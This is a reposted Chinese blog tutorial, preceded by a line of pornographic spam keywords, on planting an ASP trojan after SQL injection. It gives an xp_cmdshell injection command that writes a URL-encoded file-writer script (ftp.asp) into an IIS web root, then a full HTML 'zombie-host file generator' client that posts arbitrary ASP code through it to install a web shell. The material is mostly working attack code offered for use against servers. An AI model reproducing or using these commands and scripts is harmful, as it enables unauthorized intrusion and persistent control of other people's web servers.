日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 运维知识 > 数据库 >内容正文

数据库

SQL注入与ASP木马上传

發(fā)布時(shí)間:2023/12/8 数据库 29 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SQL注入与ASP木马上传 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
SQL注入后,如何上傳木馬,一直是比較頭疼的事,我這里提供上傳木馬的一種另一種方法。
1、SQL注入的時(shí)候,用xp_cmdshell 向服務(wù)器上寫(xiě)入一個(gè)能寫(xiě)文件的asp文件。
文件內(nèi)容:
<%
Set objFSO = Server.CreateObject
("scripting.FileSystemObject")


Set objCountFile=objFSO.CreateTextFile
(request("mypath"),True)


objCountFile.Write request("mydata")
objCountFile.Close
%>
這個(gè)文件可以寫(xiě)成一行
<%Set objFSO = Server.CreateObject
("scripting.FileSystemObject"):
Set objCountFile=objFSO.CreateTextFile
(request("mypath"),True):objCountFile.Write request("mydata"):
objCountFile.Close%>


將特殊字符進(jìn)行編碼 就可以得到
%3C%25Set%20objFSO%20=%20Server.CreateObject
(%22scripting.FileSystemObject%22):
Set%20objCountFile=objFSO.CreateTextFile(request(%22mypath%22),True):
objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E


注入(這里假定web目錄是C:/Inetpub/wwwroot/):?
exec master..xp_cmdshell 'echo?
"%3C%25Set%20objFSO%20=%20Server.CreateObject
(%22scripting.FileSystemObject%22):
Set%20objCountFile=objFSO.CreateTextFile
(request(%22mypath%22),True):
objCountFile.Write%20request(%22mydata%22):
objCountFile.Close%25%3E" > C:/Inetpub/wwwroot/ftp.asp';


這樣 在服務(wù)器的web 目錄下 將生成一個(gè) ftp.asp文件
該文件的代碼為
<%
Set objFSO = Server.CreateObject
("scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile
(request("mypath"),True)
objCountFile.Write request
("mydata")
objCountFile.Close
%>
你可以看到,上面代碼中預(yù)留了兩個(gè)接口 mypath 和 mydata


mypath是下次提交的時(shí)候 文件的生成路徑
mydata是文件的內(nèi)容


在本地編寫(xiě)一個(gè)客戶端文件 例:RohuClient.htm 代碼如下


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>肉雞文件生成器--客戶端 制作:絕對(duì)零度 QQ:12216796</title>
<style type="text/css">
<!--
TD {
FONT-SIZE: 9pt; LINE-HEIGHT: 150%
}
BODY {
FONT-SIZE: 12px;
FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif, 宋體;
SCROLLBAR-FACE-COLOR: #eeeeee;?
SCROLLBAR-HIGHLIGHT-COLOR: #ffffff;?
SCROLLBAR-SHADOW-COLOR: #dee3e7;?
SCROLLBAR-3DLIGHT-COLOR: #d1d7dc;?
SCROLLBAR-ARROW-COLOR: #006699;?
SCROLLBAR-TRACK-COLOR: #ededed;?
SCROLLBAR-DARKSHADOW-COLOR: #98aab1
}


?


A:link {
FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
}
A:visited {
FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
}
A:hover {
COLOR: #cc0000; LINE-HEIGHT: 18px; TEXT-DECORATION: underline
}
input,select,TEXTAREA {
font-family: "tahoma", "arial", "helvetica", "sans-serif", "宋體";
background-color: #f9f9f9;?
font-size: 9pt ;?
border: 1px #d2d2d2 dobble;
line-height:120%;
}


-->
</style>
</head>
<script language="javascript" type="text/javascript">
function chk(theform)
{
if(theform.ftpUrl.value=='')
{
alert('請(qǐng)輸入遞交的地址!');
theform.ftpUrl.focus();
return false;
}
if(theform.MyPath.value=='')
{
alert('請(qǐng)輸入生成文件的位置!');
theform.MyPath.focus();
return false;
}
if(theform.MyData.value=='')
{
alert('請(qǐng)輸入生成文件的內(nèi)容!');
theform.MyData.focus();
return false;
}
theform.action=theform.ftpUrl.value;
}
</script>
<body>
<form name="RohuForm" method="post"?
action="" onSubmit="return chk(this)" target="_blank">


<table width="673" border="0" align="center"?
cellpadding="0" cellspacing="0">
<tr>
<td width="11%">目標(biāo)位置:</td>
<td width="79%"><input name="ftpUrl"
type="text" id="ftpUrl" size="50">
例:http://127.0.0.1/FTP.ASP<;/td>
</tr>
<tr>
<td>生成文件:</td>
<td><input name="MyPath" type="text" id="MyPath">
將在服務(wù)器上,生成的文件路徑。例:
C:/Inetpub/wwwroot/Server.asp </td>
</tr>
<tr>
<td valign="top">文件代碼:</td>
<td><textarea name="MyData" cols="100"?
rows="10" id="textarea"></textarea></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="提交"></td>
</tr>
</table>
<br>
</form>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center">版權(quán)所有:
XXXX(<a href=http://www.rxxx.com;>xx盟</a>)</td>
</tr>
</table>
</body>
</html>


在目標(biāo)位置欄填上剛剛生成的ftp.asp文件的url地址?
如 http://127.0.0.1/ftp.asp (這里假設(shè)服務(wù)器的ip是 127.0.0.1)
在生成文件欄 輸入將在服務(wù)器上生成的文件名 比如:C:/Inetpub/wwwroot/Server.asp?
在文件內(nèi)容里 ,隨意的粘貼一個(gè)asp代碼?
點(diǎn)遞交,當(dāng)http://127.0.0.1/ftp.asp 文件執(zhí)行完畢 基本上服務(wù)器上的asp木馬就生成了。

總結(jié)

以上是生活随笔為你收集整理的SQL注入与ASP木马上传的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。